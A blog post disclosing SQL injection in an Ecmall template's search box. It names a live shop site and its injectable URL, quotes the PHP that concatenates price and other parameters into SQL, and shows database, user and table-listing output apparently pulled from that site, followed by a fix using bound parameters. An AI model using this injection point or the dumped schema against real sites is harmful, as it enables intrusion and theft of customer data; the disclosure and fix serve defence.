SQL injection in the search box of an Ecmall site-builder template

http://www.tuutao.com/index.php (土淘网) is built on an Ecmall site-builder template; every site that uses this template should be affected in the same way.

The search box is injectable. Injection point:

http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000

The code first reads the parameters passed via GET, then concatenates them into a single SQL condition string. 

1. This code in search.app.php builds the SQL for the min and max price filter; nothing is filtered or escaped:

    /**
     * Build the query condition string
     *
     * @param   array   $param  query parameters (see the return value description of _get_query_param)
     * @return  string  WHERE clause
     */
    function _get_goods_conditions($param)
    {
        /* assemble the query conditions */
        $conditions = " g.if_show = 1 AND g.closed = 0 AND s.state = 1"; // on sale, not banned, and the store is open
        if (isset($param['keyword']))
        {
            $conditions .= $this->_get_conditions_by_keyword($param['keyword'], ENABLE_SEARCH_CACHE);
        }
        if (isset($param['cate_id']))
        {
            // 'layer' is interpolated into a column name, 'cate_id' into a quoted value
            $conditions .= " AND g.cate_id_{$param['layer']} = '" . $param['cate_id'] . "'";
        }
        if (isset($param['brand']))
        {
            $conditions .= " AND g.brand = '" . $param['brand'] . "'";
        }
        if (isset($param['region_id']))
        {
            $conditions .= " AND s.region_id = '" . $param['region_id'] . "'";
        }
        if (isset($param['price']))
        {
            // min_price / max_price from the query string, concatenated as-is
            $min = $param['price']['min'];
            $max = $param['price']['max'];
            $min > 0 && $conditions .= " AND g.price >= '$min'";
            $max > 0 && $conditions .= " AND g.price <= '$max'";
        }

        return $conditions;
    }

 

2. The following code is the part that executes the query; the condition string built above is passed straight into it:

                /* price statistics */
                if ($total_count > NUM_PER_PAGE)
                {
                    // $conditions comes from _get_goods_conditions() and is concatenated unchanged
                    $sql = "SELECT MIN(g.price) AS min, MAX(g.price) AS max FROM {$table} WHERE" . $conditions;
                    $row = $goods_mod->getRow($sql);
                    $min = $row['min'];
                    $max = min($row['max'], MAX_STAT_PRICE);
                    $step = max(ceil(($max - $min) / PRICE_INTERVAL_NUM), MIN_STAT_STEP);
                    $sql = "SELECT FLOOR((g.price - '$min') / '$step') AS i, count(*) AS count FROM {$table} WHERE " . $conditions . " GROUP BY i ORDER BY i";
                    $res = $goods_mod->db->query($sql);
                    while ($row = $goods_mod->db->fetchRow($res))
                    {
                        $data['by_price'][] = array(
                            'count' => $row['count'],
                            'min'   => $min + $row['i'] * $step,
                            'max'   => $min + ($row['i'] + 1) * $step,
                        );
                    }
                }
            }

 

3. Many other parameters on this page are not filtered either; audit all of them.

Databases:

available databases [2]:
[*] information_schema
[*] tuutao

Account:

current user:    'tuutao_u@localhost'

Tables in the tuutao database:

Database: tuutao
[84 tables]
+------------------------+
| _ecm_third_login       |
| chat_customgroup       |
| chat_pals              |
| chat_session           |
| chat_transfer_fileinfo |
| chat_users             |
| ecm_acategory          |
| ecm_address            |
| ecm_ads_left           |
| ecm_article            |
| ecm_ative              |
| ecm_attribute          |
| ecm_brand              |
| ecm_cart               |
| ecm_category_goods     |
| ecm_category_store     |
| ecm_collect            |
| ecm_coupon             |
| ecm_coupon_sn          |
| ecm_friend             |
| ecm_function           |
| ecm_game               |
| ecm_gcategory          |
| ecm_get_prize          |
| ecm_goods              |
| ecm_goods_attr         |
| ecm_goods_image        |
| ecm_goods_integral     |
| ecm_goods_qa           |
| ecm_goods_spec         |
| ecm_goods_statistics   |
| ecm_goods_tpl          |
| ecm_goods_tuijian      |
| ecm_groupbuy           |
| ecm_groupbuy_log       |
| ecm_handsel            |
| ecm_hdlog              |
| ecm_integral           |
| ecm_logistics          |
| ecm_logistics_conf     |
| ecm_logsingle          |
| ecm_mail_queue         |
| ecm_member             |
| ecm_member_ofields     |
| ecm_message            |
| ecm_module             |
| ecm_money_logs         |
| ecm_navigation         |
| ecm_order              |
| ecm_order_extm         |
| ecm_order_goods        |
| ecm_order_integral     |
| ecm_order_log          |
| ecm_pageview           |
| ecm_partner            |
| ecm_payment            |
| ecm_privilege          |
| ecm_prize              |
| ecm_promotion          |
| ecm_promotion_local    |
| ecm_promotion_log      |
| ecm_recommend          |
| ecm_recommended_goods  |
| ecm_refer              |
| ecm_region             |
| ecm_scategory          |
| ecm_seckill            |
| ecm_seckill_subject    |
| ecm_sessions           |
| ecm_sessions_data      |
| ecm_sgrade             |
| ecm_ship               |
| ecm_shipping           |
| ecm_specialpage        |
| ecm_specialpage_goods  |
| ecm_specify            |
| ecm_store              |
| ecm_template           |
| ecm_third_login        |
| ecm_timedisc           |
| ecm_uploaded_file      |
| ecm_user_coupon        |
| ecm_user_priv          |
| ecm_user_prize         |
+------------------------+

 

Fix: filter and escape every user-supplied parameter before it is concatenated into the SQL (cast numeric values, and use bound parameters or proper escaping for string values).
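As an added illustration of that fix (this is not Ecmall's code), the following is a hardened rewrite of the condition builder from search.app.php: numeric parameters are cast, the category layer that selects a column name is whitelisted, and every value is returned as a bound parameter instead of being spliced into the SQL text. The function name build_goods_conditions, the allowed layer range 1..3, and the PDO connection and $table join expression referenced in the trailing comment are assumptions for the example.

```php
<?php
// Added example, not Ecmall's own code: a hardened rewrite of the condition builder
// shown above. Numeric inputs are cast, the column suffix is whitelisted, and every
// value becomes a bound parameter so no user-supplied text is spliced into the SQL.

function build_goods_conditions(array $param): array
{
    $sql    = " g.if_show = 1 AND g.closed = 0 AND s.state = 1";
    $values = [];

    if (isset($param['cate_id'], $param['layer'])) {
        // 'layer' picks a column name (g.cate_id_1, g.cate_id_2, ...), so it cannot be
        // bound as a value; it is whitelisted to a small integer range instead
        // (the range 1..3 is an assumption, not taken from Ecmall)
        $layer = (int)$param['layer'];
        if ($layer < 1 || $layer > 3) {
            throw new InvalidArgumentException('invalid category layer');
        }
        $sql     .= " AND g.cate_id_{$layer} = ?";
        $values[] = (int)$param['cate_id'];   // assumed to be an integer id
    }
    if (isset($param['brand'])) {
        $sql     .= " AND g.brand = ?";
        $values[] = (string)$param['brand'];  // bound, never concatenated
    }
    if (isset($param['region_id'])) {
        $sql     .= " AND s.region_id = ?";
        $values[] = (int)$param['region_id'];
    }
    if (isset($param['price'])) {
        // A float cast keeps only the leading numeric prefix, so a quote character in
        // min_price or max_price can never reach the query text
        $min = (float)($param['price']['min'] ?? 0);
        $max = (float)($param['price']['max'] ?? 0);
        if ($min > 0) {
            $sql     .= " AND g.price >= ?";
            $values[] = $min;
        }
        if ($max > 0) {
            $sql     .= " AND g.price <= ?";
            $values[] = $max;
        }
    }
    return [$sql, $values];
}

// Constructed sample input mirroring the GET parameters of the search URL above,
// with a stray quote in two of the values to show it never reaches the SQL string
$param = [
    'layer'   => 1,
    'cate_id' => '45',
    'brand'   => "acme'",
    'price'   => ['min' => "100'x", 'max' => '10000'],
];
[$where, $values] = build_goods_conditions($param);
echo $where, "\n";   // only '?' placeholders appear in the SQL text
print_r($values);    // Array ( [0] => 45 [1] => acme' [2] => 100 [3] => 10000 )

// Execution with PDO (a $pdo connection and the $table join expression used by
// search.app.php are assumed to exist; neither is defined in this example):
// $stmt = $pdo->prepare("SELECT MIN(g.price) AS min, MAX(g.price) AS max FROM {$table} WHERE" . $where);
// $stmt->execute($values);
```

The second query in the original (the FLOOR/GROUP BY histogram) reuses the same $conditions string, so it is fixed by the same change: pass $where into prepare() and $values into execute(); the $min and $step it interpolates are computed from database results and arithmetic, not from request input.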

All articles on this blog are original unless otherwise noted. When copying or reposting, credit the source 起风了 with a hyperlink to the original article, "Ecmall某建站模板搜索框SQL注射".